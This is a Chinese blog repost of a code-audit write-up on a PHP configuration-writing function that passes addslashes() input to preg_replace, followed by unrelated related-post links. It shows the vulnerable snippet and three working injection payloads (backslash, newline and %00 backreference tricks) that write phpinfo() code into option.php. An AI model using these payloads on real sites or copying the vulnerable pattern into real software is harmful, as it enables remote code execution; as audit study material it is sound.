2. 程式人生 > >一個PHP正則相關的“經典漏洞” preg_replace

一個PHP正則相關的“經典漏洞” preg_replace

阿新 發佈:2018-12-23

https://www.cdxy.me/?p=756

小密圈《程式碼審計》中看到P神發的“經典漏洞”,關於寫配置檔案這個功能點。

問題程式碼

<?php
$str = addslashes($_GET['option']);
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|\$option=\'.*\';|',"\$option='$str';",$file);
file_put_contents('xxxxx/option.php',$file);

?>

輸入經過addslashes()處理過之後經匹配替換指定檔案內容。

解法1 利用反斜線

輸入\';phpinfo();//

\'經過addslashes()之後變為\\\',隨後preg_replace會將兩個連續的\合併為一個,也就是將\\\'轉為\\',這樣我們就成功引入了一個單引號,閉合上文註釋下文,中間加入要執行的程式碼即可。

看來是preg_replace函式特性。經測試,該函式會針對反斜線進行轉義,即成對出現的兩個反斜線合併為一個,以前不知道這個點(跟進)。

本地測試環境:PHP 5.4.45 + Windows + Apache

解法2 利用正則

過程分為兩個請求:

第一次傳入aaa';phpinfo();%0a//

此時檔案內容

$option='aaa\';phpinfo();
//'
 
;

第二次傳入隨意字串,如bbb正則程式碼.*會將匹配到的aaa\替換為bbb

此時檔案內容(成功寫入惡意程式碼)

$option='bbb';phpinfo();
//';

解法3 利用%00

仍然分為兩步。

第一次傳入;phpinfo();此時檔案內容為:

$option=';phpinfo();';

第二次傳入%00

%00addslashes()轉為\0,而\0preg_replace函式中會被替換為“匹配到的全部內容”,此時preg_replace要執行的程式碼如下

preg_replace('|\$option=\'.*\';|',"\$option='\0';",$file);

也就是

preg_replace('|\$option=\'.*\';|'
 
,"\$option='$option=';phpinfo();';';",$file);

成功引入單引號閉合,最終寫入shell

$option='\$option=';phpinfo();';';

Ref

小密圈:《程式碼審計》
@Dlive
@L3m0n
@該隱
@phith0n

相關推薦

一個PHP相關的“經典漏洞preg_replace

https://www.cdxy.me/?p=756小密圈《程式碼審計》中看到P神發的“經典漏洞”,關於寫配置檔案這個功能點。問題程式碼<?php $str = addslashes($_GET['option']); $file = file_get_contents(

php判斷一個變數是否為整數

方法1 判斷正整數 $keyword = '10'; // 0 1.1 1 if(preg_match("/^[1-9][0-9]*$/",$keyword)){ echo "是正整數!";

js相關

round 字符串 microsoft func cti prompt otto line onos js正則相關1.檢測是否是數字,包括整數,小數 var str = prompt("請輸入一個數字"); var reg = /^\-?(0|[1-9]\d*)(\.\

php表達式基本

you src 單個字符 規則 echo tin 小括號 點號 修飾 一.正則表達式的組成 1.分隔符,可以是除了字母,數字,反斜線及空白以外的任何字符,比如/,!,#,%,|,~等;通常有/,!,~ 2.表達式:由一些特殊字符和非特殊字符組成. 3.修飾符:用於開

PHP表達式的快速學習方法

rep 邊界 web頁面 匹配 too 引用 span 常用 正常 2008-10-20 22:08 1、入門簡介 簡單的說,正則表達式是一種可以用於模式匹配和替換的強有力的工具。我們可以在幾乎所有的基於UNIX系統的工具中找到正則表達式的身影,例如,vi

PHP表達式詳解

-s span 詳解 ont 字符 常用 正則表達式 pla 方括號 一、常用函數: 1、pre_match(參數A,參數B),參數A為正則規則,參數B為被驗證的字符串,符合驗證規則則返回1,否則返回0。 2、preg_replace(參數A,參數B,參數C),參數A為正

jQuery擴展插件以及相關函數練習

正則 jquer 相關 img jquery擴展 ges 練習 alt cnblogs 一、jQuery擴展插件 二、相關正則函數: jQuery擴展插件以及正則相關函數練習

PHP采集圖片並保存

con lap sta php正則 exists conn hid 文件名 time <?php /* *功能:php完美實現下載遠程圖片保存到本地 *參數:文件url,保存文件目錄,保存文件名稱,使用的下載方式 *當保存文件名稱為空時則使用遠程文件原來的名稱

php驗證手機、郵箱

als href 驗證 clas private hone net 電話 span //驗證電話private function reg_phone($phone){ if (preg_match("/^13[0-9]{1}[0-9]{8}$|15[0189]

PHP系統(六)PHP表達式

php正則php正則表達式 正則表達式是一種描述字符串結果的語法規則,是一個特定的格式化模式,可以匹配、替換、截取匹配的字符串。常用的語言基本上都有正則表達式,如JavaScript、java等。其實,只有了解一種語言的正則使用,其他語言的正則使用起來,就相對簡單些。文本主要圍繞解決下面問題展開

php 匹配出a標簽級a標簽中的內容

har set ext htm file 鏈接地址 header char pre <?phpheader("Content-type: text/html; charset=utf-8"); $str=file_get_contents("https://www.

PHP使用技巧1

span icon light class col 字符串 mat lac log $pattern="/<div class=\"cover g-playicon\">(.*?)>/s"; 意思為抓取<div class="cover g-play

PHP

php 正則 基礎概念正則表達式是通過一系列符合某個規則的字符串來匹配要搜索的內容。正則表達式有三種用法:1.匹配:從某個字符串抽取信息;2.替換:新文本替換匹配的舊文本;3.分組:把字符串拆分成小塊字符串的數組匹配規則使用 preg_match 函數可以實現對正則表達式的匹配能力。//第一個參數是正

PHP 表達式(PCRE)

nal php rep uno 則表達式 異常 spl sin html PHP 正則表達式(PCRE) 正則表達式(regular expression)描述了一種字符串匹配的模式,可以用來檢查一個串是否含有某種子串、將匹配的子串做替換或者從某個串中取出符合某個條件的子

PHP表達式匹配俄文字符

first html col zh-cn all com .cn 匹配 reg 之前弄過匹配中文的 見 http://www.cnblogs.com/toumingbai/p/4688433.html preg_match_all("/([\x{0400}-\x{04FF

php

號碼 log 包含 pac bank 中英文 email 身份證號碼 信號 1.郵箱驗證 1 $email=‘1515212@qq‘; 2 $preg_email=‘/^[a-zA-Z0-9]+([-_.][a-zA-Z0-9]+)*@([a-zA-Z0-9]+[-.]

PHP匹配6到16位字符組合(且只能為數字、字母、下劃線)

lin asd fun 整合 bsp pass www. 正則 -m php正則匹配6到16位的字符串。 只允許包含數字、字母、下劃線組成的6到16位字符,符合返回ture,否則返回false。 解答: 6到16位,正則可以這樣寫:{6,16}。 任意的字符6到16位的正則

php判斷手機號碼的方法

判斷 想象 模式 php dump 符號表 博客 5.5 obi 用正則匹配手機號碼的時候, 我們先分析一下手機號碼的規律: 1. 手機號通常是11位的 2. 經常是1開頭 3. 第二個數字通常是34578這幾個數字, 2014.5.5日170號段的手機號開賣所以這裏多了

php字符串提取漢字

字符串變量 正則 字符 div code join 變量 IV 漢字 /*$str 為輸入、輸出字符串變量*/ preg_match_all(‘/[\x{4e00}-\x{9fff}]+/u‘, $str, $matches); $str = join(‘‘, $m

php 匹配中文

保存 not .so UNC 進制數 進制 修正 下劃線 inpu 轉載:http://hi.baidu.com/?_d/blog/item/063b77d5432f8f1aa18bb7fd.html 在javascript中,要判斷字符串是中文是很簡單的。比如:var